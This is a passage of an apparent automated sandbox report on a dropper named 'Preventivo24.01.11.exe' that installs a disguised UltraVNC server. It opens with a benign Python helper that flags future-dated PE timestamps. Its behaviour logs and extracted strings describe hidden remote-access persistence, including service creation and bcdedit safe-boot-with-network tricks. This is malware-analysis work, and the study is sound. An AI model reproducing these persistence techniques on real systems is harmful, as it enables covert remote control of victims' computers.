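The line above is the evidence behind the "Binary contains a suspicious time stamp" signature in the report head: the dropped shi5398.tmp carries an IMAGE_FILE_HEADER.TimeDateStamp of 0xC7FEC470, which decodes to 29 April 2076, more than fifty years after the sample was captured. The following Python is an added example for this page, not code from the report or from the sandbox vendor: it reads the COFF timestamp straight out of the PE header with struct (no pefile dependency) and classifies it against the time the sample was observed. The observed time is taken from the "/wintime 1706007874" value in the msiexec command line earlier in this section (23 January 2024 UTC); treating that value as the capture time, the one-day slack, the 1995 lower bound and the stub header builder used for testing are my assumptions.

```python
"""Decode a PE TimeDateStamp and flag build times that cannot be right."""
import struct
from datetime import datetime, timezone

# /wintime value from the msiexec command line in this report (2024-01-23 UTC), used here
# as the moment the sample was observed. Assumption made for this example.
ANALYSIS_EPOCH = 1706007874
ONE_DAY = 86400
EARLIEST_PLAUSIBLE = 788918400   # 1995-01-01 UTC; assumed floor for any PE32 toolchain still in use


def pe_timestamp(data: bytes) -> int:
    """Return IMAGE_FILE_HEADER.TimeDateStamp from raw PE file bytes."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)      # offset of the 'PE\0\0' signature
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    # COFF header follows the signature: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    (stamp,) = struct.unpack_from("<I", data, e_lfanew + 8)
    return stamp


def stamp_to_utc(stamp: int) -> str:
    """Render the 32-bit epoch stamp the way the report does, e.g. '2076-04-29 05:06:56 UTC'."""
    return datetime.fromtimestamp(stamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")


def timestamp_verdict(stamp: int, observed_epoch: int, slack: int = ONE_DAY) -> str:
    """Classify a build stamp relative to the time the sample was observed."""
    if stamp == 0:
        return "zeroed"              # reproducible builds and some packers write 0 here
    if stamp > observed_epoch + slack:
        return "future"              # a file cannot be linked after it was captured
    if stamp < EARLIEST_PLAUSIBLE:
        return "implausibly_old"
    return "plausible"


def make_stub_pe(stamp: int) -> bytes:
    """Constructed MZ stub + PE signature + COFF header for testing; not a loadable binary."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                  # e_lfanew -> signature at 0x40
    # Machine=i386, 1 section, stamp, no symbols, PE32 optional header size, EXECUTABLE|32BIT
    coff = struct.pack("<HHIIIHH", 0x14C, 1, stamp, 0, 0, 0xE0, 0x102)
    return bytes(dos) + b"PE\0\0" + coff


if __name__ == "__main__":
    s = pe_timestamp(make_stub_pe(0xC7FEC470))
    print(hex(s), stamp_to_utc(s), timestamp_verdict(s, ANALYSIS_EPOCH))
```

A future-dated stamp is a weak indicator on its own (Delphi binaries and some linkers write odd values, and a stamp of 0 is normal for reproducible builds), which is why the verdict function separates "zeroed" from "future" instead of treating every unusual value the same way; combined with the renamed UltraVNC server and the firewall change seen above, it is one more reason to treat the dropped file as hostile.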
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B20CA0 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_00B20CA0
Source: Preventivo24.01.11.exe Static PE information: section name: .didat
Source: ddengine.dll.0.dr Static PE information: section name: .SharedD
Source: shi5398.tmp.0.dr Static PE information: section name: .wpp_sf
Source: shi5398.tmp.0.dr Static PE information: section name: .didat
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_05508A79 push es; ret 0_3_05508E9A
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_05510604 push es; retf 0_3_055106EE
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_05519828 pushad ; retf 0_3_05519829
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_05510893 push es; ret 0_3_05510896
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_05508EAD push es; retf 0_3_05508EAE
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_05508EAF push es; iretd 0_3_05508EBA
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_054EFF47 push edx; ret 0_3_054EFF59
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_054EFF67 push esi; ret 0_3_054EFF79
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_054F932D pushfd ; retf 0_3_054F9332
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_054EFD27 push ds; ret 0_3_054EFD39
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_054EFD3A push ss; ret 0_3_054EFD79
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_054EFD83 push ss; ret 0_3_054EFD79
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_054F83A7 push ds; retf 0_3_054F83A8
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_054F760B push cs; retf 0_3_054F760C
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_054F841B push ds; retf 0_3_054F841C
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00AFA4B0 push ecx; mov dword ptr [esp], 3F800000h 0_2_00AFA60F
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00BEB2DE push ecx; ret 0_2_00BEB2F1
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_009FFB10 push ecx; mov dword ptr [esp], ecx 0_2_009FFB11
Source: C:\Games\viewer.exe Code function: 7_2_009850CC push ecx; ret 7_2_009850DF
Source: C:\Games\viewer.exe Code function: 7_2_00985676 push ecx; ret 7_2_00985689
Source: C:\Games\taskhost.exe Code function: 42_2_006C6143 push ecx; ret 42_2_006C6156
Source: C:\Games\taskhost.exe Code function: 42_2_005851FF pushad ; iretd 42_2_00585218
Source: C:\Games\taskhost.exe Code function: 42_2_0058E25B pushad ; iretd 42_2_0058E25C
Source: C:\Games\taskhost.exe Code function: 42_2_0058E27D pushad ; iretd 42_2_0058E27E
Source: C:\Games\taskhost.exe Code function: 42_2_0058E275 pushad ; iretd 42_2_0058E276
Source: C:\Games\taskhost.exe Code function: 42_2_0058E263 pushad ; iretd 42_2_0058E264
Source: C:\Games\taskhost.exe Code function: 42_2_00585265 push 60F5C5F1h; iretd 42_2_00585278
Source: C:\Games\taskhost.exe Code function: 42_2_0058E5FB pushad ; iretd 42_2_0058E5FC
Source: C:\Games\taskhost.exe Code function: 42_2_0058C5A6 pushad ; iretd 42_2_0058C5A9
Source: C:\Games\taskhost.exe Code function: 42_2_0058E61D pushad ; iretd 42_2_0058E61E
Source: C:\Games\taskhost.exe Code function: 42_2_0058E615 pushad ; iretd 42_2_0058E616

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\taskhost.exe
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\viewer.exe
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Local\Temp\MSI5406.tmp
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Local\Temp\shi5398.tmp
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Local\Temp\MSI54C4.tmp
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\vnchooks.dll
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.dll
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Local\Temp\MSI54A3.tmp
Source: taskhost.exe.0.dr Binary or memory string: bcdedit.exe
Source: taskhost.exe.0.dr Binary or memory string: RegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -inifile -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkWow64DisableWow64FsRedirectionkernel32Wow64RevertWow64FsRedirectionSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootwinsta.dllWinStationConnectWLockWorkstation failed with error 0x%0lXWTSEnumerateSessionsAwtsapi32WTSFreeMemoryConsole -preconnect -service_rdp_run -service_run Global\SessionEventUltraGlobal\SessionEventUltraPreConnectGlobal\EndSessionEventGlobal\SessionUltraPreConnectsas.dllSendSASWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%dwinlogon.exeWTSEnumerateProcessesASeTcbPrivilegeRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
Source: C:\Games\taskhost.exe Code function: 42_2_005AAEE0 GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStructA,GetPrivateProfileStructA,GetPrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA, 42_2_005AAEE0
Source: C:\Games\taskhost.exe Code function: 42_2_005A7AE0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA, 42_2_005A7AE0
Source: C:\Games\taskhost.exe Code function: 42_2_005B37A0 GetPrivateProfileIntA,EnumDisplaySettingsA,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary,GetFileVersionInfoSizeA,GetFileVersionInfoA,VerQueryValueA,VerQueryValueA,VerQueryValueA,CreateDCA,DeleteDC, 42_2_005B37A0
Source: C:\Games\viewer.exe Code function: 7_2_00983D28 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 7_2_00983D28
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Games\viewer.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Games\viewer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Games\viewer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Games\viewer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Games\viewer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exe Code function: 42_2_005A57B0 GetPrivateProfileStringA,WTSGetActiveConsoleSessionId,KiUserCallbackDispatcher,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,Process32Next,ProcessIdToSessionId,Process32Next,CloseHandle,CloseHandle, 42_2_005A57B0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi5398.tmp
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI54C4.tmp
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\vnchooks.dll
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.dll
Source: C:\Games\taskhost.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Games\viewer.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Games\taskhost.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Games\viewer.exe API coverage: 5.1 %
Source: C:\Windows\SysWOW64\timeout.exe TID: 5280 Thread sleep count: 166 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 7864 Thread sleep count: 182 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 7084 Thread sleep count: 170 > 30
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B46F90 FindFirstFileW,FindClose,CreateEventW,CreateThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle, 0_2_00B46F90
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B49080 FindFirstFileW,FindClose,CloseHandle,CloseHandle, 0_2_00B49080
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A05220 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,PathIsUNCW, 0_2_00A05220
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B1D700 FindFirstFileW,GetLastError,FindClose, 0_2_00B1D700
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B68B30 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose, 0_2_00B68B30
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B1CDD0 FindFirstFileW,FindFirstFileW,FindClose,FindClose, 0_2_00B1CDD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B43210 FindFirstFileW,FindClose, 0_2_00B43210
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00AFF570 FindFirstFileW,FindNextFileW,FindClose, 0_2_00AFF570
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B53790 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose, 0_2_00B53790
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B53C10 FindFirstFileW,FindClose, 0_2_00B53C10
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B2BFF0 FindFirstFileW,FindClose,FindClose, 0_2_00B2BFF0
Source: C:\Games\viewer.exe Code function: 7_2_0099BC3B FindFirstFileExW, 7_2_0099BC3B
Source: C:\Games\taskhost.exe Code function: 42_2_0059EC90 GetDlgItem,GetModuleFileNameA,_strrchr,FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose, 42_2_0059EC90
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B52400 GetLogicalDriveStringsW,GetDriveTypeW,Wow64DisableWow64FsRedirection,Wow64RevertWow64FsRedirection, 0_2_00B52400
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00BE7833 VirtualQuery,GetSystemInfo, 0_2_00BE7833
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\c.cmd
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmd.txt
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmmc.cmd
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\
